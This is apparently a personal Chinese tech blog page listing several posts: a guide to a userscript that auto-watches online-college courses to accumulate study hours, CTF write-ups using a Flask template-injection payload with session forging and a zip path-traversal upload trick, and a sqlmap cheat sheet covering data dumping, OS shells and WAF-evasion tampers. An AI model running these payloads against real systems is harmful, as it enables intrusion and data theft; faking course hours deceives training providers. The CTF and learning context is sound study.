<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="生活,代码,学习" />
   
  <meta name="description" content="用于学习记录学习笔记" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
     用于学习记录学习笔记
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/m.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

<link rel="alternate" href="/atom.xml" title="WYC's Blog" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      
<section class="cover">
    
  <div class="cover-frame">
    <div class="bg-box">
      <img src="/images/cover1.jpg" alt="image frame" />
    </div>
    <div class="cover-inner text-center text-white">
      <h1><a href="/">WYC&#39;s Blog</a></h1>
      <div id="subtitle-box">
        
        <span id="subtitle"></span>
        
      </div>
      <div>
        
      </div>
    </div>
  </div>
  <div class="cover-learn-more">
    <a href="javascript:void(0)" class="anchor"><i class="ri-arrow-down-line"></i></a>
  </div>
</section>



<script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js"></script>


<!-- Subtitle -->

  <script>
    try {
      var typed = new Typed("#subtitle", {
        strings: ['面朝大海，春暖花开', '愿你一生努力，一生被爱', '想要的都拥有，得不到的都释怀'],
        startDelay: 0,
        typeSpeed: 200,
        loop: true,
        backSpeed: 100,
        showCursor: true
      });
    } catch (err) {
      console.log(err)
    }
  </script>
  
<div id="main">
  <section class="outer">
  
  

<div class="notice" style="margin-top:50px">
    <i class="ri-heart-fill"></i>
    <div class="notice-content" id="broad"></div>
</div>
<script type="text/javascript">
    fetch('https://v1.hitokoto.cn')
        .then(response => response.json())
        .then(data => {
            document.getElementById("broad").innerHTML = data.hitokoto;
        })
        .catch(console.error)
</script>

<style>
    .notice {
        padding: 20px;
        border: 1px dashed #e6e6e6;
        color: #969696;
        position: relative;
        display: inline-block;
        width: 100%;
        background: #fbfbfb50;
        border-radius: 10px;
    }

    .notice i {
        float: left;
        color: #999;
        font-size: 16px;
        padding-right: 10px;
        vertical-align: middle;
        margin-top: -2px;
    }

    .notice-content {
        display: initial;
        vertical-align: middle;
    }
</style>
  
  <article class="articles">
    
    
    
    
    <article
  id="post-网上学院-学时助手"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/07/16/%E7%BD%91%E4%B8%8A%E5%AD%A6%E9%99%A2-%E5%AD%A6%E6%97%B6%E5%8A%A9%E6%89%8B/"
    >网上学院-学时助手</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/07/16/%E7%BD%91%E4%B8%8A%E5%AD%A6%E9%99%A2-%E5%AD%A6%E6%97%B6%E5%8A%A9%E6%89%8B/" class="article-date">
  <time datetime="2021-07-16T01:30:29.000Z" itemprop="datePublished">2021-07-16</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%B7%A5%E5%85%B7/">工具</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <ul>
<li><h1 id="安装TamperMonkey浏览器扩展"><a href="#安装TamperMonkey浏览器扩展" class="headerlink" title="安装TamperMonkey浏览器扩展"></a>安装TamperMonkey浏览器扩展</h1></li>
</ul>
<h3 id="火狐浏览器：安装tampermonkey扩展"><a href="#火狐浏览器：安装tampermonkey扩展" class="headerlink" title="火狐浏览器：安装tampermonkey扩展"></a>火狐浏览器：<a target="_blank" rel="noopener" href="https://addons.mozilla.org/zh-CN/firefox/addon/tampermonkey/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search">安装tampermonkey扩展</a></h3><h3 id="Edge浏览器：安装tampermonkey扩展"><a href="#Edge浏览器：安装tampermonkey扩展" class="headerlink" title="Edge浏览器：安装tampermonkey扩展"></a>Edge浏览器：<a target="_blank" rel="noopener" href="https://microsoftedge.microsoft.com/addons/detail/tampermonkey/iikmkjmpaadaobahmlepeloendndfphd?hl=zh-CN">安装tampermonkey扩展</a></h3><p><img src="https://i.loli.net/2021/07/16/Abp5cXvoeBmNnSR.png" alt="image-20210716092430692"></p>
<p>安装完了之后在地址栏边上就会有这个图标，然后点击它，选择“添加新脚本’</p>
<p><img src="https://i.loli.net/2021/07/16/hPGTu5aUZcEC4pO.png" alt="image-20210716092443869"></p>
<ul>
<li><h1 id="安装刷课脚本"><a href="#安装刷课脚本" class="headerlink" title="安装刷课脚本"></a>安装刷课脚本</h1></li>
<li><h3 id="脚本地址：网上学院-学时助手2-0-greasyfork-org"><a href="#脚本地址：网上学院-学时助手2-0-greasyfork-org" class="headerlink" title="脚本地址：网上学院-学时助手2.0 (greasyfork.org)"></a>脚本地址：<a target="_blank" rel="noopener" href="https://greasyfork.org/zh-CN/scripts/429429-网上学院-学时助手2-0">网上学院-学时助手2.0 (greasyfork.org)</a></h3></li>
</ul>
<p><img src="https://i.loli.net/2021/07/21/D1iQZFWo8hUuSaT.png" alt="image-20210721150036597"></p>
<p>安装之后会在Edge浏览器导航栏边上出现一个图标，如下图：</p>
<p><img src="https://i.loli.net/2021/08/05/UqyVsHAgOYo69kQ.png" alt="image-20210805174122643"></p>
<ul>
<li><h3 id="根据自己要刷课的专区（默认是”数字菁英”培训专区），重新编辑脚本。"><a href="#根据自己要刷课的专区（默认是”数字菁英”培训专区），重新编辑脚本。" class="headerlink" title="根据自己要刷课的专区（默认是”数字菁英”培训专区），重新编辑脚本。"></a>根据自己要刷课的专区（默认是”数字菁英”培训专区），重新编辑脚本。</h3></li>
</ul>
<p><img src="https://i.loli.net/2021/08/05/1pgKJmTNhuv9Zca.png" alt="image-20210805174303772"></p>
<h3 id="将要刷课的专区网址（需要登录网上学院）替换下图中的红框部分。"><a href="#将要刷课的专区网址（需要登录网上学院）替换下图中的红框部分。" class="headerlink" title="将要刷课的专区网址（需要登录网上学院）替换下图中的红框部分。"></a>将要刷课的专区网址（需要登录网上学院）替换下图中的红框部分。</h3><p><img src="https://i.loli.net/2021/08/05/x7VYcw9DX2zEnRB.png" alt="image-20210805174419801"></p>
<ul>
<li><h1 id="刷课用法："><a href="#刷课用法：" class="headerlink" title="刷课用法："></a>刷课用法：</h1></li>
</ul>
<p>登录网上学院后，选择“主题专栏”-再刷新网页-就开始自动选择“未完成”的课程进行观看，看完一个课程或者一个视频卡住 会返回到列表选择下一个课程观看（会多出来一个标签），观看期间会10秒钟保存一次。如果浏览器禁止网页弹窗，则需要点击允许弹出窗口。</p>
<h4 id="火狐浏览器："><a href="#火狐浏览器：" class="headerlink" title="火狐浏览器："></a>火狐浏览器：</h4><p><img src="https://i.loli.net/2021/07/15/ZLVBECI5dwynq7e.png" alt=""></p>
<h4 id="Edge浏览器："><a href="#Edge浏览器：" class="headerlink" title="Edge浏览器："></a>Edge浏览器：</h4><p><img src="C:%5CUsers%5CWYC%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20210805175037309.png" alt="image-20210805175037309"></p>
<p><img src="https://i.loli.net/2021/08/05/2kPDIl6fXG8nyio.png" alt="image-20210805175208585"></p>
<h3 id="允许弹出窗口权限之后再刷新一次当前窗口即可。"><a href="#允许弹出窗口权限之后再刷新一次当前窗口即可。" class="headerlink" title="允许弹出窗口权限之后再刷新一次当前窗口即可。"></a>允许弹出窗口权限之后再刷新一次当前窗口即可。</h3> 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%88%B7%E8%AF%BE/" rel="tag">刷课</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-CTF-任意文件读取-Flask模板注入"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/04/21/CTF-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-Flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"
    >CTF-afr3-任意文件读取+Flask模板注入</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/04/21/CTF-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-Flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" class="article-date">
  <time datetime="2021-04-21T07:31:35.000Z" itemprop="datePublished">2021-04-21</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a> / <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%AC%94%E8%AE%B0/">笔记</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <hr>
<p><strong>任意⽂件读取</strong>+flask<strong>模版注⼊</strong></p>
<p>本题考查对linux系统中/proc/目录下文件作用的了解，同时考查了flask模板注入<br>关于/proc/目录<br>Linux系统上的/proc目录是一种文件系统，即proc文件系统。与其它常见的文件系统不同的是，/proc是一种伪文件系统（也即虚拟文件系统），存储的是当前内核运行状态的一系列特殊文件，用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息，甚至可以通过更改其中某些文件来改变内核的运行状态。<br>/proc/[pid],当查看当前进程的时候可以用/proc/self代替<br>cmdline — 启动当前进程的完整命令，但僵尸进程目录中的此文件不包含任何信息<br>cwd — 指向当前进程运行目录的一个符号链接<br>environ — 当前进程的环境变量列表，彼此间用空字符（NULL）隔开；变量用大写字母表示，其值用小写字母表示开始</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140242.png" alt="在这里插入图片描述"></p>
<p>随便写一个名字</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140250.png" alt="在这里插入图片描述"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140305.png" alt="在这里插入图片描述"></p>
<p>有一个name参数，利用这个name参数获取当前执行系统命令</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140312.png" alt="在这里插入图片描述"></p>
<p>得到python server.py，然后查看server.py的源代码</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140329.png" alt="在这里插入图片描述"></p>
<p>可以看到有个flag.py和key.py</p>
<p>在flag.py中应该是存在flag，但是不能查看</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="string">"n1code"</span> not <span class="keyword">in</span> session or session[<span class="string">'n1code'</span>] is None: session[<span class="string">'n1code'</span>] = n1code</span><br><span class="line">template = None</span><br><span class="line"><span class="keyword">if</span> session[<span class="string">'n1code'</span>] is not None:</span><br><span class="line"> template = <span class="string">''</span><span class="string">'&lt;h1&gt;N1 Page&lt;/h1&gt; &lt;div class="row&gt; &lt;div class="col-md-6 col-md-offset-3 center"&gt; Hello : %s, why you don'</span>t look at our &lt;a href=<span class="string">'/article?name=article'</span>&gt;article&lt;/a&gt;? &lt;/div&gt; &lt;/div&gt; <span class="string">''</span><span class="string">' %</span></span><br><span class="line"><span class="string">session['</span>n1code<span class="string">']</span></span><br><span class="line"><span class="string">session['</span>n1code<span class="string">'] = None</span></span><br><span class="line"><span class="string">return render_template_string(template)</span></span><br></pre></td></tr></table></figure>

<p>可以看到这里存在ssti，可以用flask的session伪造获取flag<br>这里直接就用了别人的</p>
<figure class="highlight plain"><figcaption><span>'&#123;&#123;\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()&#125;&#125;'&#125;```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">查看key.py</span><br><span class="line"></span><br><span class="line">伪造</span><br><span class="line"></span><br><span class="line">&#96;&#96;&#96;sh</span><br><span class="line">.&#x2F;flask_session_cookie_manager3.py encode -s &quot;Drmhze6EPcv0fN_81Bj-nA&quot; -t &quot;&#123;&#39;n1code&#39;: &#39;&#123;&#123;\&#39;\&#39;.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\&#39;os\&#39;].popen(\&#39;cat flag.py\&#39;).read()&#125;&#125;&#39;&#125;&quot;</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p><code>.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.X9cMyw.LNLkPxsZMuvjh4nOv6BzncVmDs4</code></p>
<p>修改session</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140523.png" alt="在这里插入图片描述"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423140535.png" alt="在这里插入图片描述"></p>
<p>获得flag</p>
<blockquote>
<p><a href="https://blog.csdn.net/Youth____/article/details/111171019" target="_blank" rel="noopener">(21条消息) 《从0到1：CTFer成长之路》配套题目第一章afr_3_Youth____的博客-CSDN博客</a></p>
</blockquote>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-CTF-文件上传"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/04/21/CTF-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"
    >CTF-文件上传</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/04/21/CTF-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="article-date">
  <time datetime="2021-04-21T06:32:12.000Z" itemprop="datePublished">2021-04-21</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a> / <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%AC%94%E8%AE%B0/">笔记</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <hr>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421143324.png" alt="image-20210421143316986"></p>
<p>首先<code>dirsearch</code>跑一遍目录：</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421143530.png" alt="image-20210421143530140"></p>
<p>发现并没有什么，查看代码发现上传文件之后会创建一个临时文件</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421143857.png" alt="image-20210421143857371"></p>
<p>接着上传一个文件之后发现多了一个<code>/upload</code>路径，应该就是保存上传的文件</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421143640.png" alt="image-20210421143640521"></p>
<p>由于限制了上传文件的类型</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421143944.png" alt="image-20210421143944773"></p>
<p>所以就考虑从这几种文件类型下手，考虑有图片马，改压缩文件元数据</p>
<blockquote>
<p>参考：<a href="https://blog.csdn.net/zy15667076526/article/details/114139749" target="_blank" rel="noopener">https://blog.csdn.net/zy15667076526/article/details/114139749</a></p>
</blockquote>
<p>在本地编辑一个php代码文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> phpinfo() <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>命名为：123456789012345678</p>
<p>然后压缩，使用<code>010 Editor</code> 编辑zip文件的元数据:</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421144538.png" alt="image-20210421144538248"></p>
<p>找到这个属性双击打开编辑内容：</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210421144623.png" alt="image-20210421144623869"></p>
<p>编辑为：<code>/…/…/111.php.zzz</code> 。</p>
<p>因为上传的文件在<code>/upload/随机数/</code> 这个目录里面，需要两次跳转上一级目录才能到网站根目录。所以需要文件名为<code>/…/…/file.php</code>，由于需要构造解析，利用<code>apache</code>的解析漏洞，如果从右开始，直到哪个能识别就解析哪个，构造最终文件名为<code>/…/…/111.php.zzz</code>，这个文件名长度为18位</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210423135725.png" alt="image-20210423135725728"></p>
<p>然后去上传这压缩文件，目标系统就会解压这个压缩包，根据压缩包的文件名元数据保存文件时就会穿越2层目录，最终保存到更目录。</p>
<p>利用apache的文件解析漏洞，访问这个php，就可以拿到flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xxxxx.com&#x2F;111.php.zzz</span><br></pre></td></tr></table></figure>

 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-SQL注入-基本教程"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/04/17/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E6%9C%AC%E6%95%99%E7%A8%8B/"
    >SQL注入-基本教程</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/04/17/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E6%9C%AC%E6%95%99%E7%A8%8B/" class="article-date">
  <time datetime="2021-04-17T06:02:13.000Z" itemprop="datePublished">2021-04-17</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <hr>
<p>一套基础的sqlmap语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">跑库：python sqlmap.py  --batch -t 4 -u &quot;http:&#x2F;&#x2F;xxxxx&#x2F;x?id&#x3D;1&quot; --dbs</span><br><span class="line"></span><br><span class="line">跑表：python sqlmap.py --batch -t 4  -u &quot;http:&#x2F;&#x2F;xxxxx&#x2F;x?id&#x3D;1&quot; -D 库名 --tables</span><br><span class="line"></span><br><span class="line">跑列：python sqlmap.py --batch -t 4  -u &quot;http:&#x2F;&#x2F;xxxxx&#x2F;x?id&#x3D;1&quot; -D 库名 -T 表名 --columns</span><br><span class="line"></span><br><span class="line">跑数据：python sqlmap.py --batch -t 4  -u &quot;http:&#x2F;&#x2F;xxxxx&#x2F;x?id&#x3D;1&quot; -D 库名 -T 表名 -C &quot;列名1,列名2&quot; --dump</span><br></pre></td></tr></table></figure>



<h3 id="用到的参数"><a href="#用到的参数" class="headerlink" title="用到的参数"></a>用到的参数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">--technique    sqlmap中的注入技术</span><br><span class="line">--batch   默认选择，自动运行</span><br><span class="line">--current-db  当前数据库</span><br><span class="line">--current-user  当前数据库用户名</span><br><span class="line">--is-dba  查看当前用户是否为管理员权限</span><br><span class="line">--data   post型注入时的post数据</span><br><span class="line">--threads  最大并发线程（不要超过10）</span><br><span class="line">-r  跟http请求头的头部文件.txt--cookie  cookie注入</span><br><span class="line">--level   探测等级，3最好，5最全面</span><br><span class="line">--sql-shell   运行自定义sql语句</span><br><span class="line">--os-shell  运行操作系统命令</span><br><span class="line">--file-read  从数据库中读取文件</span><br><span class="line">--file-write &quot;本机路径&quot; --file-dest &quot;服务器路径&quot;  上传文件</span><br><span class="line">--tamper   跟自带绕过脚本--time-sec&#x3D;60 延时，用来绕waf</span><br><span class="line">过WAF--identify-waf 检测是否有waf</span><br><span class="line">--random-agent -v 2 使用任意浏览器进行绕过</span><br><span class="line">--hpp -v 3 使用HTTP 参数污染进行绕过</span><br><span class="line">--proxy&#x3D;211.211.211.211:8080 --proxy-cred&#x3D;211:985 使用代理</span><br><span class="line">--flush-session 清空会话，重构注入</span><br><span class="line">--hex 进行字符码转换</span><br><span class="line">--mobile 对移动端的服务器进行注入</span><br><span class="line">--tor  匿名注入</span><br><span class="line">--delay&#x3D;3.5 --time-sec&#x3D;60 使用长的延时来避免触发WAF的机制</span><br></pre></td></tr></table></figure>



<h3 id="0x01-–technique参数"><a href="#0x01-–technique参数" class="headerlink" title="0x01 –technique参数"></a>0x01 –technique参数</h3><p><strong>—technique</strong>是为sqlmap中的注入技术，在sqlmap中其支持5中不同模式的注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">B:Boolean-based-blind  （布尔型盲注）</span><br><span class="line">E:Error-based   （报错型注入）</span><br><span class="line">U:Union query-based  （联合注入）</span><br><span class="line">S:Starked queries   （通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数，可多语句查询注入）</span><br><span class="line">T:Time-based blind  （基于时间延迟注入）</span><br></pre></td></tr></table></figure>

<p>例如sqlmap语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli-labs-master&#x2F;Less-5&#x2F;?id&#x3D;1&quot; --technique E --dbs --batch</span><br></pre></td></tr></table></figure>



<h3 id="0x02-–data参数和–threads参数"><a href="#0x02-–data参数和–threads参数" class="headerlink" title="0x02 –data参数和–threads参数"></a>0x02 –data参数和–threads参数</h3><p>post注入时，post的数据就放在–data后，–threads加快跑的速率，不要超过10</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli-labs-master&#x2F;Less-11&#x2F;?id&#x3D;1&quot; --data &quot;uname&#x3D;1&amp;passwd&#x3D;11&amp;submit&#x3D;Submit&quot;</span><br><span class="line">--technique UES </span><br><span class="line">--dbms mysql --dbs --threads 8</span><br></pre></td></tr></table></figure>



<h3 id="0x03-r参数"><a href="#0x03-r参数" class="headerlink" title="0x03 -r参数"></a>0x03 -r参数</h3><p>将HTTP请求包的内容放在一个txt文件里面，cookie可以不用放，然后-r跟上txt文件的路径，让sqlmap自动跑，这里要注意将可能出现sql注入的请求参数的值后面要跟上”*“符号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES</span><br><span class="line">或者 </span><br><span class="line">python sqlmap.py -u &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;sqli-labs-master&#x2F;Less-18&#x2F;&quot; --user-agent&#x3D;&quot;Mozilla&#x2F;5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko&#x2F;20100101 Firefox&#x2F;61.0*&quot; --level 4 --dbs --threads 10 --technique BEST</span><br></pre></td></tr></table></figure>

<p>如果知道sql注入的确切位置，那么这里可以直接使用第二种方式注入</p>
<h3 id="0x04-–cookie参数"><a href="#0x04-–cookie参数" class="headerlink" title="0x04 –cookie参数"></a>0x04 –cookie参数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">web应用基于cookie的身份验证，对于post请求，可以指定cookie，cookie注入时直接使用这个参数</span><br><span class="line">sqlmap -u &quot;url&quot; --cookie&#x3D;&quot;...&quot; --level 3 –-dbs</span><br></pre></td></tr></table></figure>



<h3 id="0x05-–os-shell-参数"><a href="#0x05-–os-shell-参数" class="headerlink" title="0x05 –os-shell 参数"></a>0x05 –os-shell 参数</h3><p>知道数据库为管理员权限，并且知道网址根目录，那么使用这一个参数，可以上传webshell和反弹shell。</p>
<p>用–is-dba查看是否为管理员权限</p>
<h3 id="0x06-–file-read参数"><a href="#0x06-–file-read参数" class="headerlink" title="0x06 –file-read参数"></a>0x06 –file-read参数</h3><p>知道网站的一些文件的目录，或者网站服务器里面的固定文件的目录，那么可以使用这个参数来读取文件内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;?id&#x3D;1&quot; --file-read &quot;C:&#x2F;windows&#x2F;win.ini&quot;</span><br></pre></td></tr></table></figure>



<h3 id="0x07-–file-write-–file-dest参数"><a href="#0x07-–file-write-–file-dest参数" class="headerlink" title="0x07 –file-write –file-dest参数"></a>0x07 –file-write –file-dest参数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--file-write &quot;本机选择上传文件的路径&quot; --file-dest &quot;服务器根目录路径&quot;  </span><br><span class="line">知道一个站点存在sql注入且知道网站根目录的前提下可使用此参数</span><br></pre></td></tr></table></figure>



<h3 id="0x08-–tamper-参数"><a href="#0x08-–tamper-参数" class="headerlink" title="0x08 –tamper 参数"></a>0x08 –tamper 参数</h3><p>–tamper参数专门跟一些脚本的，比如说sqlmap自带的一些绕过的脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py xxxx --tamper &quot;脚本名&quot;</span><br></pre></td></tr></table></figure>

<p>常用的绕过脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">apostrophemask.py 用utf8代替引号</span><br><span class="line">equaltolike.py  对等号的绕过，用like代替等号</span><br><span class="line">greatest.py  MySQL中绕过过滤’&gt;’</span><br><span class="line">space2hash.py 绕过空格的过滤</span><br><span class="line">halfversionedmorekeywords.py mysql数据库绕过防火墙</span><br><span class="line">ase64encode.py  将语句用base64编码</span><br><span class="line">between.py  替换&gt;号</span><br><span class="line">space2plus.py  用+替换空格</span><br><span class="line">chardoubleencode.py 双url编码</span><br><span class="line">randomcase.py  随机大小写</span><br><span class="line">randomcomments.py  用&#x2F;**&#x2F;分割sql关键字</span><br></pre></td></tr></table></figure>





<p>参考</p>
<blockquote>
<p><a href="https://my.oschina.net/u/4399679/blog/3372449" target="_blank" rel="noopener">https://my.oschina.net/u/4399679/blog/3372449</a></p>
</blockquote>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-SQL注入-POST登录框"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/04/17/SQL%E6%B3%A8%E5%85%A5-POST%E7%99%BB%E5%BD%95%E6%A1%86/"
    >SQL注入-POST登录框</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/04/17/SQL%E6%B3%A8%E5%85%A5-POST%E7%99%BB%E5%BD%95%E6%A1%86/" class="article-date">
  <time datetime="2021-04-17T05:27:06.000Z" itemprop="datePublished">2021-04-17</time>
</a> 
  <div class="article-category">
